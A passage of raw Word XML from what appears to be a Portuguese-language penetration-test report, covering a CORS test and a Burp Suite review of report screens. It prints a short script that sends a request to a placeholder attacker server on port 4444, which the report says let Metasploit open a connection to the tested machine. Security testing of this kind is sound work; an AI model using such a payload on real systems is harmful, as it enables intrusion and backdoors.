        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="00008B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00AC10DC">
      <w:pPr>
        <w:spacing w:after="22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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">r = </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="00008B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>XMLHttpRequest</w:t>
      </w:r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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">(); </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00AC10DC">
      <w:pPr>
        <w:spacing w:after="22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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>r.open(</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4A1C21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"GET"</w:t>
      </w:r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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,’</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="1155CC"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>http://IP_do_servidor:4444’,false</w:t>
      </w:r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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00AC10DC">
      <w:pPr>
        <w:spacing w:after="22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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>r.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="303336"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>setRequestHeader(“</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="353528"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFAF6"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Access-Control-Allow-Origin</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="303336"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>”,”*”);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00AC10DC">
      <w:pPr>
        <w:spacing w:after="22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eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="6A737C"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r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</w:rPr>
        <w:t>.send();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00AC10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&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="6A737C"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="00008B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F06E4" w:rsidRPr="00F15F82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0F06E4" w:rsidRPr="00F15F82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spera-se que a conexão não seja aberta.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7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04AF1" w:rsidRPr="00F15F82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  <w:r w:rsidR="001E29F7" w:rsidRPr="00F15F82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0F06E4" w:rsidRPr="00F15F8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76012" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">O sistema </w:t>
      </w:r>
      <w:r w:rsidR="00881DA5" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">não </w:t>
      </w:r>
      <w:r w:rsidR="00D76012" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>passou nos testes</w:t>
      </w:r>
      <w:r w:rsidR="000F06E4" w:rsidRPr="00F15F82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8C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Conforme as figuras 32 e 33, a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requisição foi bem sucedida e o Metasploit conseguiu iniciar o exploit.</w:t>
      </w:r>
      <w:r w:rsidR="000F06E4" w:rsidRPr="00F15F8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C6DC7" w:rsidRPr="00F15F82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Através desse exploit, uma conexão entre máquina atacada e o sistema atacante é aberta podendo haver graves consequências como: Escalada de privilégios na máquina atacada e criação de backdoors.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00751591" w:rsidRPr="00F15F82" w:rsidRDefault="00751591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77F75" w:rsidRPr="00F15F82" w:rsidRDefault="00E77F75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480F81A" wp14:editId="32BABE7C">
            <wp:extent cx="5400040" cy="1994535"/>
            <wp:effectExtent l="0" t="0" r="0" b="571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3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777DDF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Figura 31</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> –</w:t>
      </w:r>
      <w:r w:rsidR="00E52417" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Console do navegador indicando a conexão.</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82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8C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7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77F75" w:rsidRPr="00F15F82" w:rsidRDefault="00E77F75" w:rsidP="00AC10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                             </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F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12A6800" wp14:editId="12E49062">
            <wp:extent cx="3600450" cy="1323975"/>
            <wp:effectExtent l="0" t="0" r="0" b="952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777DDF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Figura 32</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Exploit inciado com sucesso.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F06E4" w:rsidRPr="00F15F82" w:rsidRDefault="000F06E4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5.2 </w:t>
      </w:r>
      <w:r w:rsidR="00777DDF" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Atividade: mapeamento</w:t>
      </w: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de vulnerabilidades – Tela Relatórios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F15F82" w:rsidRDefault="008C6DC7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i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Tarefa realizada dia 24/05/16</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7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ab/>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="005A089C" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Duração total das sessões executadas</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: 15 minutos.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7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15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Objetivo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7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Utilizar o Burp Suite para descobrir as vulnerabilidades existentes na tela Relatório e indicar as possíveis técnicas que devem ser utilizadas para explorar as vulnerabilidades encontradas.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00AC10DC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C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00AC10DC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph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F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Resultados obtidos no momento de gerar um relatório dos dados cadastrados no sistema:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D038A" w:rsidRPr="00F15F82" w:rsidRDefault="000D038A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D038A" w:rsidRPr="00F15F82" w:rsidRDefault="000D038A" w:rsidP="00AC10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583C4E9" wp14:editId="0B25F929">
            <wp:extent cx="5400040" cy="127063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34(Editada)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591" w:rsidRPr="00F15F82" w:rsidRDefault="00777DDF" w:rsidP="00AC10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Figura 33 </w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>- Burp Suite utilizado para captura de parâmetros no cabeçalho de uma requisição HTTP na tela Relatório.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00AC10DC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph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De acordo com o Burp Suite, a página não recebe nenhum parâmetro pois todos os dados disponíveis da aplicação são trazidos direto da base de dados para a tela</w:t>
      </w:r>
      <w:r w:rsidR="008719F1" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00AC10DC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0" w:firstLine="709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Quando se utiliza os campos de filtros na tela, não há requisição, pois a aplicação usa os dados carregados para filtrar os dados que serão exibidos no relatório</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82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r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Mediante a esse contexto, não foram encontradas vulnerabilidades que pudessem ser exploradas.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82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</w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00AC10DC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph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8C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00AC10DC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Resultados obtidos no momento de gerar uma impressão para um relatório:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77F75" w:rsidRPr="00F15F82" w:rsidRDefault="00E77F75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D038A" w:rsidRPr="00F15F82" w:rsidRDefault="000D038A" w:rsidP="00AC10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AD45D8E" wp14:editId="5015EB40">
            <wp:extent cx="5400040" cy="110363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35(Editada)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591" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00AC10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Figura 3</w:t>
      </w:r>
      <w:r w:rsidR="00777DDF" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">4 </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>- Burp Suite utilizado para captura de parâmetros no cabeçalho de uma requisição HTTP na tela Impressão de Relatório.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00AC10DC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph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Da mesma maneira que </w:t>
      </w:r>
      <w:r w:rsidR="008719F1" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>foi detectado na tela Relatório</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, a ferramenta indica que a tela Impressão de Relatório não gera nenhum tipo de requisição e não recebe nenhum parâmetro manipulável. Dessa forma, não foram encontradas vulnerabilidades que pudessem ser exploradas.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82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</w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00AC10DC">
      <w:pPr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8C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7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Referências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B01036" w:rsidP="00630433">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr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43">
        <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="365F91" w:themeColor="accent1" w:themeShade="BF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Piores Senhas 2015</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="00B01036" w:rsidP="0063043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44" w:history="1">
        <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="365F91" w:themeColor="accent1" w:themeShade="BF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>SQLMAP usando POST</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId45"/>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="00B01036" w:rsidP="0063043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46" w:history="1">
        <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="365F91" w:themeColor="accent1" w:themeShade="BF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>NTP</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82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</w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="00B01036" w:rsidP="0063043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47" w:history="1">
        <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="365F91" w:themeColor="accent1" w:themeShade="BF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>NetBios</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82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</w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="00B01036" w:rsidP="0063043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  <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId48" w:history="1">
        <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="365F91" w:themeColor="accent1" w:themeShade="BF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>SNMP</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="365F91" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="00B01036" w:rsidP="0063043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49" w:history="1">
        <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:bCs/>
            <w:color w:val="365F91" w:themeColor="accent1" w:themeShade="BF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>CORS</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="00B01036" w:rsidP="0063043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50" w:history="1">
        <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:bCs/>
            <w:color w:val="365F91" w:themeColor="accent1" w:themeShade="BF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>w3c - Especificação CORS</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="00B01036" w:rsidP="0063043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51" w:history="1">
        <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:bCs/>
            <w:color w:val="365F91" w:themeColor="accent1" w:themeShade="BF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>Sintaxe comentários MYSQL</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="00B01036" w:rsidP="0063043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52" w:history="1">
        <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:bCs/>
            <w:color w:val="365F91" w:themeColor="accent1" w:themeShade="BF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>Sintaxe comentários SQL Server</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="00B01036" w:rsidP="0063043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Style w:val="Hyperlink"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="365F91" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId53" w:history="1">
        <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:bCs/>
            <w:color w:val="365F91" w:themeColor="accent1" w:themeShade="BF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>Sintaxe comentários Oracle</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00BC5DD9" w:rsidRPr="00F15F82" w:rsidRDefault="00B01036" w:rsidP="0063043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Style w:val="Hyperlink"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="365F91" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId54" w:history="1">
        <w:r w:rsidR="00BC5DD9" w:rsidRPr="00F15F82">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:bCs/>
            <w:color w:val="365F91" w:themeColor="accent1" w:themeShade="BF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>L2TP</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00AC10DC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph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B70B5" w:rsidRPr="00F15F82" w:rsidRDefault="00DB70B5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DB70B5" w:rsidRPr="00F15F82" w:rsidSect="00174603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680" w:rsidRDefault="00AF4680" w:rsidP="009A6B56">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00AF4680" w:rsidRDefault="00AF4680" w:rsidP="009A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680" w:rsidRDefault="00AF4680" w:rsidP="009A6B56">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
